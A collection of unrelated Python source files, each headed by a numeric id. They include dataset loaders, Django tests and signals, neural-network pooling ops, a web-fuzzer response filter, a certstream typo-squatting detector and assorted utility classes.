143161
|
from .kitti_utils import kitti_eval, kitti_eval_coco_style
__all__ = ['kitti_eval_coco_style', 'kitti_eval']
|
143168
|
def extractLasciviousImouto(item):
"""
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'].replace('-', '.'))
if not (chp or vol) or 'preview' in item['title'].lower():
return None
if 'The Beast of the 17th District' in item['tags'] or 'the beast of the 17th district' in item['title'].lower():
return buildReleaseMessageWithType(item, 'The Beast of the 17th District', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Le Festin de Vampire' in item['tags']:
return buildReleaseMessageWithType(item, 'Le Festin de Vampire', vol, chp, frag=frag, postfix=postfix)
return False
|
143209
|
from framework.core.myexception import FuzzException
from threading import Thread
from framework.fuzzer.fuzzobjects import FuzzResult
from framework.utils.myqueue import FuzzQueue
PYPARSING = True
try:
from pyparsing import Word, Group, oneOf, Optional, Suppress, ZeroOrMore, Literal
from pyparsing import ParseException
except ImportError:
PYPARSING = False
class FilterQ(FuzzQueue):
def __init__(self, ffilter, queue_out):
FuzzQueue.__init__(self, queue_out)
Thread.__init__(self)
self.setName('filter_thread')
self.queue_out = queue_out
if PYPARSING:
element = oneOf("c l w h")
digits = "XB0123456789"
integer = Word( digits )#.setParseAction( self.__convertIntegers )
elementRef = Group(element + oneOf("= != < > >= <=") + integer)
operator = oneOf("and or")
definition = elementRef + ZeroOrMore( operator + elementRef)
nestedformula = Group(Suppress(Optional(Literal("("))) + definition + Suppress(Optional(Literal(")"))))
self.finalformula = nestedformula + ZeroOrMore( operator + nestedformula)
elementRef.setParseAction(self.__compute_element)
nestedformula.setParseAction(self.__compute_formula)
self.finalformula.setParseAction(self.__myreduce)
self.res = None
self.hideparams = ffilter
if "XXX" in self.hideparams['codes']:
self.hideparams['codes'].append("0")
self.baseline = None
def get_name(self):
return 'filter_thread'
def _cleanup(self):
pass
def process(self, prio, item):
if item.is_baseline:
self.baseline = self._set_baseline_fuzz(item)
item.is_visible = self.is_visible(item)
self.send(item)
def _set_baseline_fuzz(self, res):
if "BBB" in self.hideparams['lines']:
self.hideparams['lines'].append(str(res.lines))
if "BBB" in self.hideparams['codes']:
self.hideparams['codes'].append(str(res.code))
if "BBB" in self.hideparams['words']:
self.hideparams['words'].append(str(res.words))
if "BBB" in self.hideparams['chars']:
self.hideparams['chars'].append(str(res.chars))
return res
def __convertIntegers(self, tokens):
return int(tokens[0])
def __compute_element(self, tokens):
element, operator, value = tokens[0]
if value == 'BBB' and self.baseline == None:
raise FuzzException(FuzzException.FATAL, "FilterQ: specify a baseline value when using BBB")
if element == 'c' and value == 'XXX':
value = 0
if value == 'BBB':
if element == 'l':
value = self.baseline.lines
elif element == 'c':
value = self.baseline.code
elif element == 'w':
value = self.baseline.words
elif element == 'h':
value = self.baseline.chars
test = dict(w=self.res.words, c=self.res.code, l=self.res.lines, h=self.res.chars)
value = int(value)
if operator == "=":
return test[element] == value
elif operator == "<=":
return test[element] <= value
elif operator == ">=":
return test[element] >= value
elif operator == "<":
return test[element] < value
elif operator == ">":
return test[element] > value
elif operator == "!=":
return test[element] != value
def __myreduce(self, elements):
first = elements[0]
for i in range(1, len(elements), 2):
if elements[i] == "and":
first = (first and elements[i+1])
elif elements[i] == "or":
first = (first or elements[i+1])
return first
def __compute_formula(self, tokens):
return self.__myreduce(tokens[0])
def is_visible(self, res):
# baseline
if self.baseline and res.is_baseline == True:
return True
filter_string = self.hideparams['filter_string']
if filter_string and PYPARSING:
self.res = res
try:
return self.finalformula.parseString(filter_string)[0]
except ParseException, e:
raise FuzzException(FuzzException.FATAL, "Incorrect filter expression. It should be composed of: c,l,w,h/and,or/=,<,>,!=,<=,>=")
else:
if self.baseline == None and ('BBB' in self.hideparams['codes'] \
or 'BBB' in self.hideparams['lines'] \
or 'BBB' in self.hideparams['words'] \
or 'BBB' in self.hideparams['chars']):
raise FuzzException(FuzzException.FATAL, "FilterQ: specify a baseline value when using BBB")
if self.hideparams['codes_show'] is None:
cond1 = True
else:
cond1 = not self.hideparams['codes_show']
if self.hideparams['regex_show'] is None:
cond2 = True
else:
cond2 = not self.hideparams['regex_show']
if str(res.code) in self.hideparams['codes'] \
or str(res.lines) in self.hideparams['lines'] \
or str(res.words) in self.hideparams['words'] \
or str(res.chars) in self.hideparams['chars']:
cond1 = self.hideparams['codes_show']
if self.hideparams['regex']:
if self.hideparams['regex'].search(res.history.fr_content()):
cond2 = self.hideparams['regex_show']
return (cond1 and cond2)
if __name__ == "__main__":
tests = []
tests.append("(w=200 and w=200) or w=200")
tests.append("(w=400 and w=200) and (w=200 or w=200 or w=000)")
tests.append("(w=200 and l=7) and (h=23)")
tests.append("w=201")
tests.append("w=200")
class t:
code = 200
words = 200
lines = 7
chars = 23
res = t()
f = FilterQ()
for i in tests:
print "%s := %s" % (str(i), f.is_visible(res, i))
|
143218
|
import sqlite3
from ObjetoArtista import Artista
def showArt():
try:
conexion = sqlite3.connect('musicBrainzDB.db')
cursor = conexion.cursor()
uMostrar = cursor.execute("SELECT * from Artistas").fetchall()
Art = []
for u in uMostrar:
u = Artista(id=u[0],area=u[1],TypeC=u[2],name=u[3],sort=u[4],id2=u[5],extScore=u[6])
Art.append(u)
conexion.commit()
cursor.close()
for i in Art:
print(i)
except sqlite3.Error as error:
print('Error con la conexión!', error)
finally:
if (conexion):
conexion.close()
def NArt():
try:
conexion = sqlite3.connect('musicBrainzDB.db')
cursor = conexion.cursor()
uMostrar = cursor.execute("SELECT * from Artistas").fetchall()
Art = []
for u in uMostrar:
u = Artista(id=u[0],area=u[1],TypeC=u[2],name=u[3],sort=u[4],id2=u[5],extScore=u[6])
Art.append(u._name)
conexion.commit()
cursor.close()
return len(Art)
except sqlite3.Error as error:
print('Error con la conexión!', error)
finally:
if (conexion):
conexion.close()
def main():
print(showArt())
print(showArt())
if __name__ == '__main__':
main()
|
143219
|
from django.db.models.signals import post_save
from .models import Comment
from notifications.signals import notify
from django.conf import settings
from django.apps import apps
from .tasks import email_handler
def get_recipient():
admins = [i[0] for i in settings.ADMINS]
app_model = settings.AUTH_USER_MODEL.split('.')
user_model = apps.get_model(*app_model)
recipient = user_model.objects.filter(username__in=admins)
return recipient
ADMINS = get_recipient()
SEND_NOTIFICATION_EMAIL = getattr(settings, 'SEND_NOTIFICATION_EMAIL', False)
def user2id(*args):
l = [user.id for user in args]
return l
def comment_handler(sender, instance, created, **kwargs):
if created:
recipient = ADMINS.exclude(id=instance.user.id)
if not instance.parent is None:
recipient = recipient.exclude(id=instance.parent.user.id)
if recipient.count() > 0:
notify.send(instance.user, recipient=recipient,
verb='回复了 %s' % instance.parent.user_name,
action_object=instance,
target=instance.post,
description=instance.content)
if SEND_NOTIFICATION_EMAIL:
email_handler.delay(user2id(*recipient))
if not instance.user_name == instance.parent.user_name:
notify.send(instance.user, recipient=instance.parent.user, verb='@了你',
action_object=instance,
target=instance.post,
description=instance.content)
if SEND_NOTIFICATION_EMAIL:
email_handler.delay(user2id(instance.parent.user))
else:
if recipient.count() > 0:
notify.send(instance.user, recipient=recipient, verb='发表了评论',
action_object=instance,
target=instance.post,
description=instance.content)
if SEND_NOTIFICATION_EMAIL:
email_handler.delay(user2id(*recipient))
post_save.connect(comment_handler, sender=Comment)
'''
def like_handler(sender, instance, created, **kwargs):
if created:
recipient = ADMINS.exclude(id=instance.user.id).exclude(id=instance.comment.user.id)
verb = '的评论' if instance.comment.parent is None else '的回复'
action = '赞了' if instance.status else '踩了'
if recipient.count() > 0:
notify.send(instance.user, recipient=recipient,
verb=action + instance.comment.user_name + verb,
action_object=instance.comment,
target=instance.comment.post,
description=instance.comment.content)
if (not instance.user.username == instance.comment.user_name) and instance.status:
notify.send(instance.user, recipient=instance.comment.user,
verb='赞了你' + verb,
action_object=instance.comment,
target=instance.comment.post,
description=instance.comment.content)
post_save.connect(like_handler, sender=Like)
'''
|
143226
|
import asyncio
import unittest
from types import ModuleType
from common import *
class TestArtist(unittest.TestCase):
@async_with_client(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET)
async def test_artist(self, *, client):
for artist_uri in TEST_ARTISTS:
artist = await client.get_artist(artist_uri)
await async_chain([
artist.get_albums(),
artist.get_all_albums(),
artist.total_albums(),
artist.top_tracks(),
artist.related_artists()
])
if __name__ == '__main__':
unittest.main()
|
143228
|
import unittest
import os
import numpy as np
import sys
import torch
import matplotlib.pyplot as plt
# Add .. to the PYTHONPATH
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import lilfilter.filters as F
import lilfilter.torch_filter as T
class TestTorchFilter(unittest.TestCase):
def test1(self):
filt = F.gaussian_filter(5.0)
t = T.SymmetricFirFilter(filt)
len = 500
a = torch.randn(1, len)
plt.plot(torch.arange(len), a.squeeze(0))
b = t.apply(a)
plt.plot(torch.arange(len), b.squeeze(0))
plt.show()
if __name__ == "__main__":
unittest.main()
|
143243
|
from django.core.urlresolvers import reverse
from guardian.shortcuts import assign_perm, get_objects_for_user
from core.models import ServerRole
from core.tests.base import BaseModalTestCase, BaseModalTests, BaseForbiddenModalTests
from core.tests.fixtures import ServerRoleFactory, ApplicationFactory, EnvironmentFactory, ServerFactory
class ModalServerroleForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'serverrole'}
object_factory = ServerRoleFactory
class ModalServerroleTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'serverrole'}
object_factory = ServerRoleFactory
logged_is_manager = True
def test_create(self):
response, obj = self._test_create({'name': 'ServerRoleName'})
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
def test_edit(self):
obj = self.object_factory(department=self.department)
data = {'name': 'ServerRoleName2'}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'ServerRoleName2')
class ModalApplicationForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'application'}
object_factory = ApplicationFactory
class ModalApplicationTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'application'}
object_factory = ApplicationFactory
logged_is_manager = True
@classmethod
def getSetUpObjectData(cls):
return {'department': cls.department}
def test_create(self):
response, obj = self._test_create({'name': 'ApplicationName'})
self.assertJSONEqual(response.content,
{"status": True,
"action": "redirect",
"target": reverse('application_page', kwargs={'application_id': obj.id})})
def test_edit(self):
obj = self.object_factory(department=self.department)
data = {'name': 'ApplicationName2'}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'ApplicationName2')
class ModalEnvironmentForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'environment', 'parent_name': 'application'}
object_factory = EnvironmentFactory
@classmethod
def setUpClass(cls):
super(ModalEnvironmentForbiddenTest, cls).setUpClass()
cls.application = ApplicationFactory(department=cls.department)
cls.url_params['parent_id'] = cls.application.id
class ModalEnvironmentTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'environment', 'parent_name': 'application'}
object_factory = EnvironmentFactory
logged_is_manager = True
application = None
@classmethod
def setUpClass(cls):
super(BaseModalTestCase, cls).setUpClass()
cls.application = ApplicationFactory(department=cls.department)
cls.url_params['parent_id'] = cls.application.id
cls.object = cls.object_factory(**cls.getSetUpObjectData())
@classmethod
def getSetUpObjectData(cls):
return {'application': cls.application}
def test_create(self):
response, obj = self._test_create({'name': 'EnvironmentName', 'application': self.application.id})
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
def test_edit(self):
application = ApplicationFactory(department=self.department)
obj = self.object_factory(application=application)
data = {'name': 'EnvironmentName2', 'application': self.application.id}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'EnvironmentName2')
class ModalServerForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'server', 'parent_name': 'environment'}
object_factory = ServerFactory
@classmethod
def setUpClass(cls):
super(ModalServerForbiddenTest, cls).setUpClass()
cls.application = ApplicationFactory(department=cls.department)
cls.url_params['parent_id'] = cls.application.id
class ModalServerTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'server', 'parent_name': 'environment'}
object_factory = ServerFactory
logged_is_manager = True
environment = None
@classmethod
def setUpClass(cls):
super(BaseModalTestCase, cls).setUpClass()
cls.environment = EnvironmentFactory(application=ApplicationFactory(department=cls.department))
cls.url_params['parent_id'] = cls.environment.id
cls.object = cls.object_factory(**cls.getSetUpObjectData())
@classmethod
def getSetUpObjectData(cls):
return {'environment': cls.environment}
def test_create(self):
server_role = ServerRole.objects.filter(department=self.department).first()
response, obj = self._test_create({'name': 'ServerName',
'environment': self.environment.id,
'roles': server_role.id,
'host': 'host',
'port': 22,
'user': 'user',
'method': 1,
})
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
def test_edit(self):
environment = EnvironmentFactory(application=ApplicationFactory(department=self.department))
obj = self.object_factory(environment=environment)
server_role = ServerRole.objects.filter(department=self.department).first()
data = {'name': 'ServerName2',
'environment': self.environment.id,
'roles': server_role.id,
'host': 'host',
'port': 22,
'user': 'user',
'method': 1,}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'ServerName2')
|
143263
|
class VkError(Exception):
def __init__(self, code, message, request_params):
super(VkError, self).__init__()
self.code = code
self.message = message
self.request_params = request_params
def __str__(self):
return 'VkError {}: {} (request_params: {})'.format(self.code, self.message, self.request_params)
class VkWallAccessDeniedError(VkError):
def __init__(self, code, message, request_params):
super(VkWallAccessDeniedError, self).__init__(code, message, request_params)
|
143290
|
from aurora.autodiff.autodiff import Op
from aurora.nn.pyx.fast_pooling import max_pool_forward, max_pool_backward
try:
from aurora.ndarray import gpu_op
except ImportError:
pass
class MaxPoolOp(Op):
def __call__(self, input, filter=(2, 2), strides=(2, 2)):
new_node = Op.__call__(self)
new_node.inputs = [input]
new_node.filter = filter
new_node.strides = strides
new_node.cache = {}
new_node.name = 'MaxPoolOp({})'.format(input.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
filter_height = node.filter[0]
filter_width = node.filter[1]
stride_height = node.strides[0]
stride_width = node.strides[1]
if use_numpy:
output_val[:] = max_pool_forward(input_vals[0],
filter_height=filter_height,
filter_width=filter_width,
stride_height=stride_height,
stride_width=stride_width)
else:
gpu_op.cudnn_pool_forward(input_vals[0],
filter_height, filter_width,
stride_height, stride_width,
'max',
output_val)
node.cache['forward'] = output_val
def gradient(self, node, output_grads):
return [maxPoolBack(node.inputs[0], output_grads, cache=node.cache)]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
filter_height = node.filter[0]
filter_width = node.filter[1]
stride_height = node.strides[0]
stride_width = node.strides[1]
input_batch_size = input_shapes[0][0]
input_n_channels = input_shapes[0][1]
input_height = input_shapes[0][2]
input_width = input_shapes[0][3]
new_height = int((input_height - filter_height) / stride_height) + 1
new_width = int((input_width - filter_width) / stride_width) + 1
return input_batch_size, input_n_channels, new_height, new_width
class MaxPoolGradientOp(Op):
def __call__(self, node_A, node_B, filter=(2, 2), strides=(2, 2), cache=None):
new_node = Op.__call__(self)
# node_B is the output_grad
new_node.inputs = [node_A, node_B]
new_node.filter = filter
new_node.strides = strides
new_node.cache = cache
new_node.name = 'MaxPoolGradientOp(%s)' % (node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
filter_height = node.filter[0]
filter_width = node.filter[1]
stride_height = node.strides[0]
stride_width = node.strides[1]
data = input_vals[0]
output_grad = input_vals[1]
if use_numpy:
output_val[:] = max_pool_backward(output_grad,
data,
filter_height=filter_height,
filter_width=filter_width,
stride_height=stride_height,
stride_width=stride_width
)
else:
gpu_op.cudnn_pool_backward(data, output_grad, node.cache['forward'],
filter_height, filter_width,
stride_height, stride_width,
'max',
output_val)
def gradient(self, node, output_grads):
raise NotImplementedError('Gradient of AverageGradientOp is not implemented')
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
return input_shapes[0]
# Global singleton operators
maxPool = MaxPoolOp()
maxPoolBack = MaxPoolGradientOp()
|
143350
|
class SystemUnsupported(Exception):
def __init__(self):
message = "不支持您的系统"
super().__init__(message)
class SubClassInvaild(Exception):
def __init__(self):
message = "SubClass didn't provide needed function"
super().__init__(message)
class InvalidInputUrl(Exception):
def __init__(self):
message = "商品链接无效, 请检查后重试"
super().__init__(message)
class InvalidInputTime(Exception):
def __init__(self):
message = "抢购时间无效, 请按照格式重新输入"
super().__init__(message)
|
143360
|
import numpy as np
from scipy.misc import imread, imsave
from glob import glob
# This function allows us to place in the
# brightest pixels per x and y position between
# two images. It is similar to PIL's
# ImageChop.Lighter function.
def chop_lighter(image1, image2):
s1 = np.sum(image1, axis=2)
s2 = np.sum(image2, axis=2)
index = s1 < s2
image1[index, 0] = image2[index, 0]
image1[index, 1] = image2[index, 1]
image1[index, 2] = image2[index, 2]
return image1
# Getting the list of files in the directory
files = glob('space/*.JPG')
# Opening up the first image for looping
im1 = imread(files[0]).astype(np.float32)
im2 = np.copy(im1)
# Starting loop
for i in xrange(1, len(files)):
print i
im = imread(files[i]).astype(np.float32)
# Same before
im1 += im
# im2 image shows star trails better
im2 = chop_lighter(im2, im)
# Saving image with slight tweaking on the combination
# of the two images to show star trails with the
# co-added image.
imsave('scipy_36_ex2.jpg', im1 / im1.max() + im2 / im2.max() * 0.2)
|
143363
|
import importlib
import pathlib
__all__ = [
f.stem
for f in pathlib.Path(__file__).parent.glob("*.py")
if f.is_file() and not f.name == "__init__.py"
]
for _ in __all__:
importlib.import_module("." + _, "cooltools.api")
del pathlib
del importlib
|
143376
|
import pytest
from flex.error_messages import MESSAGES
from flex.exceptions import ValidationError
from flex.validation.response import (
validate_response,
)
from tests.factories import (
SchemaFactory,
ResponseFactory,
)
from tests.utils import assert_message_in_errors
def test_response_content_type_validation():
schema = SchemaFactory(
produces=['application/json'],
paths={
'/get': {
'get': {
'responses': {'200': {'description': 'Success'}},
}
},
},
)
response = ResponseFactory(
url='http://www.example.com/get',
content_type='application/json',
)
validate_response(
response=response,
request_method='get',
schema=schema,
)
def test_response_content_type_validation_when_no_content_type_specified():
schema = SchemaFactory(
produces=['application/json'],
paths={
'/get': {
'get': {
'responses': {'200': {'description': 'Success'}},
}
},
},
)
response = ResponseFactory(
url='http://www.example.com/get',
content_type=None,
)
# this is considered valid currently, but may change
validate_response(
response=response,
request_method='get',
schema=schema,
)
def test_response_content_type_validation_ignores_parameters():
schema = SchemaFactory(
produces=['application/json'],
paths={
'/get': {
'get': {
'responses': {'200': {'description': 'Success'}},
}
},
},
)
response = ResponseFactory(
url='http://www.example.com/get',
content_type='application/json; charset=UTF-8',
)
validate_response(
response=response,
request_method='get',
schema=schema,
)
|
143400
|
from collections import defaultdict
class FrontierSet(object):
"""
A set that also maintains a partial topological ordering
The current set of "non-blocked" items can be obtained as
.frontier
"""
def __init__(self, data=None):
self._inhibiting_set = defaultdict(set)
self._blocking_set = defaultdict(set)
self._edges = set()
self._frontier = set()
self._frozenedges = None
self._frozenfrontier = None
self._frozenall = None
if data:
for d in data:
self.add(d)
def _invalidate(self):
self._frozenedges = None
self._frozenfrontier = None
self._frozenall = None
@property
def edges(self):
if self._frozenedges is None:
self._frozenedges = frozenset(self._edges)
return self._frozenedges
@property
def frontier(self):
if self._frozenfrontier is None:
self._frozenfrontier = frozenset(self._frontier)
return self._frozenfrontier
@property
def all(self):
if self._frozenall is None:
self._frozenall = frozenset(set(self._blocking_set.keys()) | set(self._inhibiting_set.keys()) | self._frontier)
return self._frozenall
def add(self, a, b=None):
"""
Add a to the set.
If b is given, require that a is a necessary prerequisite for b
:param a:
:param b:
:return:
"""
self._invalidate()
if b:
self._edges.add((a, b))
self._inhibiting_set[b].add(a)
self._blocking_set[a].add(b)
if not self._inhibiting_set[a]:
self._frontier.add(a)
self._frontier.discard(b)
else:
self._frontier.add(a)
def remove(self, a):
self._invalidate()
for b in self._blocking_set[a]:
self._edges.discard((b, a))
self._inhibiting_set[b].discard(a)
if not self._inhibiting_set[b]:
self._frontier.add(b)
for c in self._inhibiting_set[a]:
self._edges.discard((a, c))
self._blocking_set[c].discard(a)
del self._blocking_set[a]
del self._inhibiting_set[a]
self._frontier.discard(a)
def copy(self):
new = FrontierSet()
new._inhibiting_set = self._inhibiting_set.copy()
new._blocking_set = self._blocking_set.copy()
new._edges = self._edges.copy()
new._frontier = self._frontier.copy()
new._invalidate()
return new
def issubset(self, other):
return self.all.issubset(other.all) and self.edges.issubset(other.edges)
def __len__(self):
return len(self.all)
def __eq__(self, other):
return self.edges == other.edges and self.all == other.all
def __hash__(self):
return 3 * hash(self.edges) + 7 * hash(self.all)
def __iter__(self):
return iter(self.all)
def __repr__(self):
return '{%s|%s}' % (
','.join('%x' % i for i in self.frontier), ','.join('%x' % i for i in self.all - self.frontier))
|
143429
|
from datasets.MOT.constructor.base_interface import MultipleObjectTrackingDatasetConstructor
def get_mot_class_definition():
return {
1: 'Pedestrian',
2: 'Person on vehicle',
3: 'Car',
4: 'Bicycle',
5: 'Motorbike',
6: 'Non motorized vehicle',
7: 'Static person',
8: 'Distractor',
9: 'Occluder',
10: 'Occluder on the ground',
11: 'Occluder full',
12: 'Reflection',
13: '(Unknown)'
}
def get_mot20_sequences_from_path(sequences):
valid_sequences = {}
for sequence in sequences:
words = sequence.split('-')
assert len(words) == 2
assert words[0] == 'MOT20'
if words[1] not in valid_sequences:
valid_sequences[words[1]] = sequence
return valid_sequences.values()
def construct_MOT20(constructor: MultipleObjectTrackingDatasetConstructor, seed):
from .MOT17 import construct_MOT
construct_MOT(constructor, seed, get_mot20_sequences_from_path, get_mot_class_definition())
|
143453
|
import io
import os
import pickle
import tarfile
from functools import lru_cache
from typing import Dict, Tuple
import arrayfiles
import gdown
from lineflow import download
from lineflow.core import ZipDataset
def get_cnn_dailymail() -> Dict[str, Tuple[arrayfiles.TextFile]]:
url = 'https://s3.amazonaws.com/opennmt-models/Summary/cnndm.tar.gz'
root = download.get_cache_directory(os.path.join('datasets', 'cnn_dailymail'))
def creator(path):
archive_path = gdown.cached_download(url)
target_path = os.path.join(root, 'raw')
with tarfile.open(archive_path, 'r') as archive:
print(f'Extracting to {target_path}')
archive.extractall(target_path)
dataset = {}
for split in ('train', 'dev', 'test'):
src_path = f'{split if split != "dev" else "val"}.txt.src'
tgt_path = f'{split if split != "dev" else "val"}.txt.tgt.tagged'
dataset[split] = (
arrayfiles.TextFile(os.path.join(target_path, src_path)),
arrayfiles.TextFile(os.path.join(target_path, tgt_path))
)
with io.open(path, 'wb') as f:
pickle.dump(dataset, f)
return dataset
def loader(path):
with io.open(path, 'rb') as f:
return pickle.load(f)
pkl_path = os.path.join(root, 'cnndm.pkl')
return download.cache_or_load_file(pkl_path, creator, loader)
cached_get_cnn_dailymail = lru_cache()(get_cnn_dailymail)
class CnnDailymail(ZipDataset):
def __init__(self, split: str = 'train') -> None:
if split not in {'train', 'dev', 'test'}:
raise ValueError(f"only 'train', 'dev' and 'test' are valid for 'split', but '{split}' is given.")
raw = cached_get_cnn_dailymail()
super(CnnDailymail, self).__init__(*raw[split])
|
143502
|
import komand
import time
import json
import certstream
import re
import Levenshtein
from komand_typo_squatter.util import utils
from .schema import SearchCertstreamInput, SearchCertstreamOutput
class SearchCertstream(komand.Trigger):
def __init__(self):
super(self.__class__, self).__init__(
name="search_certstream",
description="Searches certstream for new certs matching query",
input=SearchCertstreamInput(),
output=SearchCertstreamOutput(),
)
def callback(self, message, context):
"""Callback handler for certstream events."""
if message["message_type"] == "heartbeat":
return
if message["message_type"] == "certificate_update":
all_domains = message["data"]["leaf_cert"]["all_domains"]
for domain in all_domains:
score = utils.score_domain(domain.lower())
# If issued from a free CA = more suspicious
if "Let's Encrypt" in message["data"]["chain"][0]["subject"]["aggregated"]:
score += 10
if self.query:
if not re.search(self.query, domain):
continue
else:
if Levenshtein.distance(str(self.domain), str(domain)) > self.levenshtein:
continue
self.send({"domain": domain, "score": score})
def run(self, params={}):
"""Run the trigger"""
self.query = params.get("query")
self.levenshtein = params.get("levenshtein")
self.domain = params.get("domain")
certstream.listen_for_events(self.callback)
def test(self, params={}):
self.query = params.get("query")
self.levenshtein = params.get("levenshtein")
self.domain = params.get("domain")
if self.query and self.domain:
self.logger.error("Can't use both levenshtein and query")
return 0
return {"domain": "komand.com", "score": "0"}
|
143620
|
import filecmp
import os
import pathlib
from typing import Optional
from approvaltests.core.namer import Namer
from approvaltests.core.reporter import Reporter
from approvaltests.core.writer import Writer
def exists(path: str) -> bool:
return os.path.isfile(path)
class ReporterNotWorkingException(Exception):
def __init__(self, reporter: Reporter):
super().__init__(f"Reporter {reporter} failed to work!")
class FileApprover(object):
def verify(
self,
namer: Namer,
writer: Writer,
reporter: Reporter,
) -> Optional[str]:
base = namer.get_basename()
approved = namer.get_approved_filename(base)
received = namer.get_received_filename(base)
# The writer has the ability to change the name of the received file
received = writer.write_received_file(received)
ok = self.verify_files(approved, received, reporter)
if not ok:
return (
f"Approval Mismatch, received != approved\n"
f"\tApproved: {approved}\n"
f"\tReceived: {received} "
)
return None
def verify_files(
self, approved_file: str, received_file: str, reporter: Reporter
) -> bool:
if self.are_files_the_same(approved_file, received_file):
os.remove(received_file)
return True
worked = reporter.report(received_file, approved_file)
if not worked:
raise ReporterNotWorkingException(reporter)
return False
@staticmethod
def are_files_the_same(approved_file: str, received_file: str) -> bool:
if not exists(approved_file) or not exists(received_file):
return False
if filecmp.cmp(approved_file, received_file):
return True
try:
approved_raw = pathlib.Path(approved_file).read_text()
approved_text = approved_raw.replace("\r\n", "\n")
received_raw = pathlib.Path(received_file).read_text()
received_text = received_raw.replace("\r\n", "\n")
return approved_text == received_text
except:
return False
|
143626
|
from typing import Dict, Any
import json
from e2e.Classes.Transactions.Transactions import Transactions
from e2e.Meros.RPC import RPC
from e2e.Meros.Liver import Liver
from e2e.Meros.Syncer import Syncer
def MultiInputClaimTest(
rpc: RPC
) -> None:
with open("e2e/Vectors/Transactions/MultiInputClaim.json", "r") as file:
vectors: Dict[str, Any] = json.loads(file.read())
transactions: Transactions = Transactions.fromJSON(vectors["transactions"])
Liver(rpc, vectors["blockchain"], transactions).live()
Syncer(rpc, vectors["blockchain"], transactions).sync()
|
143642
|
import pytest
from django.core.exceptions import FieldDoesNotExist
from heroku_connect.models import TRIGGER_LOG_STATE, TriggerLog, TriggerLogArchive
from tests.conftest import make_trigger_log, make_trigger_log_for_model
@pytest.mark.django_db
class TestTriggerLog:
def test_is_archived(self, archived_trigger_log, trigger_log):
assert archived_trigger_log.is_archived is True
assert trigger_log.is_archived is False
def test_get_model(self, trigger_log, connected_model):
assert trigger_log.get_model() == connected_model
connected_model.delete()
assert trigger_log.get_model() is None
def test_related(self, connected_class, connected_model, trigger_log):
related_trigger_log = make_trigger_log_for_model(connected_model)
unrelated_trigger_log = make_trigger_log_for_model(
connected_class.objects.create()
)
trigger_log.save()
related_trigger_log.save()
unrelated_trigger_log.save()
assert set(trigger_log.related()) == {trigger_log, related_trigger_log}
assert set(trigger_log.related(exclude_self=True)) == {related_trigger_log}
assert set(unrelated_trigger_log.related()) == {unrelated_trigger_log}
assert set(unrelated_trigger_log.related(exclude_self=True)) == set()
def test_capture_update_ok(self, trigger_log, hc_capture_stored_procedures):
trigger_log.save()
TriggerLog.objects.get()
trigger_log.capture_update()
assert TriggerLog.objects.count() == 2
def test_capture_update_without_record(self, hc_capture_stored_procedures):
failed_log = make_trigger_log(
state=TRIGGER_LOG_STATE["FAILED"],
table_name="number_object__c",
record_id=666,
action="UPDATE",
)
failed_log.save()
with pytest.raises(TriggerLog.DoesNotExist):
failed_log.capture_update()
def test_capture_update_wrong_update_field(
self, trigger_log, hc_capture_stored_procedures
):
with pytest.raises(FieldDoesNotExist):
trigger_log.capture_update(update_fields=("NOT A FIELD",))
def test_capture_insert_ok(self, trigger_log, hc_capture_stored_procedures):
trigger_log.save()
TriggerLog.objects.get()
trigger_log.capture_insert()
assert TriggerLog.objects.count() == 2
def test_capture_insert_without_record(self, hc_capture_stored_procedures):
failed_log = make_trigger_log(
state=TRIGGER_LOG_STATE["FAILED"],
table_name="number_object__c",
record_id=666,
action="INSERT",
)
failed_log.save()
with pytest.raises(TriggerLog.DoesNotExist):
failed_log.capture_insert()
def test_capture_insert_wrong_field(
self, trigger_log, hc_capture_stored_procedures
):
with pytest.raises(FieldDoesNotExist):
trigger_log.capture_insert(exclude_fields=("NOT A FIELD",))
def test_queryset(self, connected_class, trigger_log, archived_trigger_log):
trigger_log.save()
archived_trigger_log.save()
assert list(TriggerLog.objects.all()) == [trigger_log]
assert list(TriggerLogArchive.objects.all()) == [archived_trigger_log]
connected_model = connected_class.objects.create()
failed = make_trigger_log_for_model(
connected_model, state=TRIGGER_LOG_STATE["FAILED"]
)
failed.save()
assert set(TriggerLog.objects.failed()) == {failed}
assert TriggerLog.objects.all().count() == 2
assert set(TriggerLog.objects.all()) == {trigger_log, failed}
assert list(TriggerLogArchive.objects.all()) == [archived_trigger_log]
related = make_trigger_log_for_model(connected_model)
related.save()
assert TriggerLog.objects.related_to(failed).count() == 2
assert set(TriggerLog.objects.related_to(failed)) == {failed, related}
def test_str(self, trigger_log, archived_trigger_log):
assert str(trigger_log)
assert str(archived_trigger_log)
|
143651
|
import random
import sys
import acpc_python_client as acpc
from tools.agent_utils import select_action, get_info_set
from tools.io_util import read_strategy_from_file
class StrategyAgent(acpc.Agent):
"""Agent able to play any game when provided with game definition and correct strategy."""
